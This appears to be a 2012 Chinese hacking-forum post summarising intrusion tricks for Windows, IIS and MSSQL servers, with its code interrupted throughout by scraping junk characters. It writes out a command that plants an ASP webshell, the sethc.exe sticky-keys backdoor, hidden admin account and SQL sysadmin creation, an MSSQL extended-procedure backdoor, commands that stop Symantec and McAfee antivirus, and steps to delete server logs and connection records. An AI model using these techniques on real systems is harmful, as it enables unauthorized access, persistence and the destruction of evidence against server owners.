标题: 渗透技巧总结 [打印本页] 作者: admin 时间: 2012-9-5 15:00 标题: 渗透技巧总结 旁站路径问题8 H" {% o, _! F* b
1、读网站配置。% c, O3 |- ?9 }) K
2、用以下VBS+ R" I! ?4 T! B6 w* b- e5 X
On Error Resume Next$ C( { S) H$ v- {$ X$ T
If (LCase(Right(WScript.Fullname,11))="wscript.exe") Then! ~7 j/ P( ~' P. S4 N t; e
5 J8 W+ l( F( k* M7 x; \
* T1 q! n4 s2 `- x8 w9 f5 e
Msgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " 5 Q8 B* [9 l! S8 K* u$ j: K: m7 X1 O- \6 e3 w0 P9 P
Usage:Cscript vWeb.vbs",4096,"Lilo"9 j) M# S9 I6 q' J
WScript.Quit; M; ^" r" e$ w! k, n$ v
End If K$ Q8 \5 |0 R, k4 A' I
Set ObjService=GetObject+ o# \; b8 V' i: V. c
. |8 H1 T+ X; m3 ]3 n8 W
("IIS://LocalHost/W3SVC")# x3 |5 g6 `8 o8 K: N0 p
For Each obj3w In objservice$ R" t; k4 O9 `# F9 i. s# z
If IsNumeric(obj3w.Name) 2 a! }( Q/ Q8 W; Y8 ~! V3 `& _" q' y0 f ) A/ i! }$ ^: J4 qThen 3 O0 C( R2 y! v& B8 H8 \- O9 j Set OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)/ h7 U1 Z5 C( @6 E* Z
: |3 K! P" z: d" m( t6 j% I
+ b% l6 J# Z& v% J# J+ C. b
Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")0 z! y& `3 u: n o$ [7 ]- C% u
If Err ) U! A3 p8 Q6 d/ A e$ S2 K
) \' V/ v( ?8 s$ x3 U9 n<> 0 Then WScript.Quit (1)8 E e$ ]) A9 |/ |# _5 `
WScript.Echo Chr(10) & "[" & 2 q$ L1 M* ?. q3 {4 Q$ ~& W
& ` P+ c- R! I1 f; y
OService.ServerComment & "]"1 ~9 u; j! \2 a) s x
For Each Binds In OService.ServerBindings) B' L' e+ i9 O: `2 I. W4 i
1 v4 F& a% V! g& ]0 v. J 8 `0 G0 U. j2 P5 Y- K, n Web = "{ " & Replace(Binds,":"," } { ") & " }"( @/ w) X1 [0 e/ [* T( y R+ H( O' e
6 b9 ]( `; H# Y* g9 W. {5 M- [ l: T3 b
WScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","")+ N9 P. g5 e I/ X& @# q
Next 6 r% i; J4 F# K3 P 8 N+ e& g. X" [8 M# f* _5 j % X6 s: K" v. B) ] WScript.Echo "ath : " & VDirObj.Path1 j: g' p# X, w
End If+ S, Y+ n% t Y
Next . i: k2 e! k. ~( A复制代码8 v% @! b5 A( ]4 f, c
3、iis_spy列举(注:需要支持ASPX,反IISSPY的方法:将activeds.dll,activeds.tlb降权)9 ]6 b* B* f5 ]( \
4、得到目标站目录,不能直接跨的。通过echo ^<%execute(request("cmd"))%^> >>X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp 像目标目录写入webshell。或者还可以试试type命令. V+ g+ @3 N( D( f————————————————————— , T" q# m! `1 w. y, g |WordPress的平台,爆绝对路径的方法是:% m! E8 A" C, G2 A* s
url/wp-content/plugins/akismet/akismet.php " K: W+ f( K" l0 `url/wp-content/plugins/akismet/hello.php 2 s2 y. V' A' J$ M) u+ U6 R) o: k——————————————————————* f2 T6 i& N+ v" i
phpMyAdmin暴路径办法: + z9 h% i1 i8 R5 l' @$ xphpMyAdmin/libraries/select_lang.lib.php5 o; ]4 k P. I6 W: s5 k8 \
phpMyAdmin/darkblue_orange/layout.inc.php+ P ?0 {- E. p1 b' Q0 T# k6 P
phpMyAdmin/index.php?lang[]=1 % G; ], q2 C* F/ @7 u8 Gphpmyadmin/themes/darkblue_orange/layout.inc.php . Z0 n- f/ r% z( W' Q$ G0 ]————————————————————! B ?4 B X( b! j5 U& N
网站可能目录(注:一般是虚拟主机类), i: Q' f5 `7 ^1 n8 ^
data/htdocs.网站/网站/ 3 i/ n9 [! N f" s2 \$ K* `( E0 ~———————————————————— $ N7 ^" y+ x# c+ d* @CMD下操作VPN相关 : c: X# y+ l' d9 e5 n3 dnetsh ras set user administrator permit #允许administrator拨入该VPN / ~# d2 H8 k* F, K$ ?2 \1 Tnetsh ras set user administrator deny #禁止administrator拨入该VPN" d# |9 v0 H: H) J9 D
netsh ras show user #查看哪些用户可以拨入VPN7 Q( v* K5 S% {0 O
netsh ras ip show config #查看VPN分配IP的方式7 z' Y) M9 s. z# d$ Q1 v
netsh ras ip set addrassign method = pool #使用地址池的方式分配IP& _- d5 |/ A! W# k% R% Z
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254* k `! r" n) k, p) D" [# C* ]
————————————————————! E6 r C5 o* ~5 z1 Z
命令行下添加SQL用户的方法! Q. p) k( C: F! s! g9 L
需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下: 9 c& e+ `# c& a6 ^: s0 l; Sexec master.dbo.sp_addlogin test,1239 \* Y' K, q1 c8 J8 P
EXEC sp_addsrvrolemember 'test, 'sysadmin', M6 c* N! p. @) a( ^4 u' N& b
然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry r W& L7 f8 d, X! ~+ K' t a1 T1 P% @. I; \1 C) |
另类的加用户方法8 n, m" R. r8 S( Y! W
在删掉了net.exe和不用adsi之外,新的加用户的方法。代码如下:" l7 d+ E) n) W0 n
js: $ h2 L- x! W1 evar o=new ActiveXObject( "Shell.Users" );; j+ i1 `; Q2 J( \4 P3 Q) ]( q
z=o.create("test") ; + |- s% o1 X# Q( t+ K2 {3 v( B2 f! xz.changePassword("123456","") 0 m" n2 r* T* q9 k3 Y4 R! mz.setting("AccountType")=3;* |) o: d% B3 H
5 c `+ ~# S- T( ?! Vvbs:: X4 E! m2 T" F, h' h
Set o=CreateObject( "Shell.Users" )4 Q! f) H% T: e# `' n9 P$ z
Set z=o.create("test")- `8 f, z8 @8 r! b: g% @7 J8 P p
z.changePassword "123456",""- H& I0 y. Z% k9 y$ d
z.setting("AccountType")=3 3 S0 f2 f# _4 ]2 N% N2 u0 R—————————————————— & z7 p/ i# ~: wcmd访问控制权限控制(注:反everyone不可读,工具-文件夹选项-使用简单的共享去掉即可)/ F$ N1 A; Y7 W! y8 h
8 k3 f5 N* `3 \6 f/ x+ K0 p$ ~( F命令如下 + A& q. \' ^. k. T% Bcacls c: /e /t /g everyone:F #c盘everyone权限 9 d I; y( M- `$ v) ^, ]cacls "目录" /d everyone #everyone不可读,包括admin . C' x% T8 }' |————————以下配合PR更好————4 g! u3 {' m9 X# l
3389相关- u4 W' p4 h4 ?) x" V5 Y' ]2 _
a、防火墙TCP/IP筛选.(关闭net stop policyagent & net stop sharedaccess) 9 ~& S, e8 {5 t/ {5 _b、内网环境(LCX): _2 s$ i! [6 {
c、终端服务器超出了最大允许连接 # l9 C% @' u. a2 uXP 运行mstsc /admin : b% O' n$ x( ]3 e; i2003 运行mstsc /console 4 F: n9 k: e8 ?
4 ~" I4 h0 Y$ |0 U
杀软关闭(把杀软所在的文件的所有权限去掉)7 b; Y/ r+ V" A! t' M% X$ ]
处理变态诺顿企业版: * E4 Z0 M4 n9 E4 Rnet stop "Symantec AntiVirus" /y1 k) v; b4 }, g6 R6 @
net stop "Symantec AntiVirus Definition Watcher" /y' q; Z5 R5 [' M0 H, F' h
net stop "Symantec Event Manager" /y+ O" {( v M* b) {4 C7 e" X
net stop "System Event Notification" /y 8 P5 {% A) _* E9 G' p/ Xnet stop "Symantec Settings Manager" /y. G! m8 Q7 c1 m r {
! {' i, c5 k$ v/ i' i# r4 n
卖咖啡:net stop "McAfee McShield" H7 a( {- c1 c, J————————————————————5 p+ j7 w. h5 F, L3 ~' x
6 C' O/ |9 C# G
5次SHIFT:$ ^3 ]$ o; W; e4 j
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe ( a, Y8 [: H* ^/ A7 E ccopy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y $ \4 g2 V% `6 b5 ]copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y5 `' A; `+ W7 t5 u6 y' D8 c
——————————————————————/ t# M' ?; N* [
隐藏账号添加: 6 H9 e6 ^4 a; }1、net user admin$ 123456 /add&net localgroup administrators admin$ /add $ h3 I" j' Q0 \0 a9 s- O2、导出注册表SAM下用户的两个键值% V0 p1 q5 g0 w: N
3、在用户管理界面里的admin$删除,然后把备份的注册表导回去。 3 F7 W# @8 x* D8 o& a+ O4、利用Hacker Defender把相关用户注册表隐藏2 H6 d7 q' |' a. w" M- R! F
—————————————————————— + M* `7 ]6 w9 MMSSQL扩展后门: 7 {: {# R1 g# @5 N h: PUSE master;6 l5 S( ]" t" u5 ^" K
EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';3 O. l& f6 i- Z
GRANT exec On xp_helpsystem TO public; $ U; @; P+ W/ @# N- L' I, `———————————————————————& J) G) |- G, F
日志处理 0 L7 A; c7 x7 w; m0 d! pC:\WINNT\system32\LogFiles\MSFTPSVC1>下有 {0 w! o3 s" T) H5 y$ S
ex011120.log / ex011121.log / ex011124.log三个文件, 0 Z6 \9 {& H7 P) I直接删除 ex0111124.log 0 a, l; O5 T, _; Y/ o0 P0 J不成功,“原文件...正在使用” % T% g" R# G, }- E当然可以直接删除ex011120.log / ex011121.log 8 Z7 u( ^$ [# ]% M: [6 J) C用记事本打开ex0111124.log,删除里面的一些内容后,保存,覆盖退出,成功。 - a; f6 C6 O. m8 T& a当停止msftpsvc服务后可直接删除ex011124.log3 ` J! G/ R4 H
+ Z1 R7 ]+ a9 @5 D' X. O
MSSQL查询分析器连接记录清除: 3 _& a. X$ Y! G' uMSSQL 2000位于注册表如下: 8 x H5 N- f5 g1 U% wHKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers $ e. F: o y. U# c: z找到接接过的信息删除。+ q& @; r7 G$ S5 ?
MSSQL 2005是在C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL & Q2 d& i3 [2 Q v* Q% r* W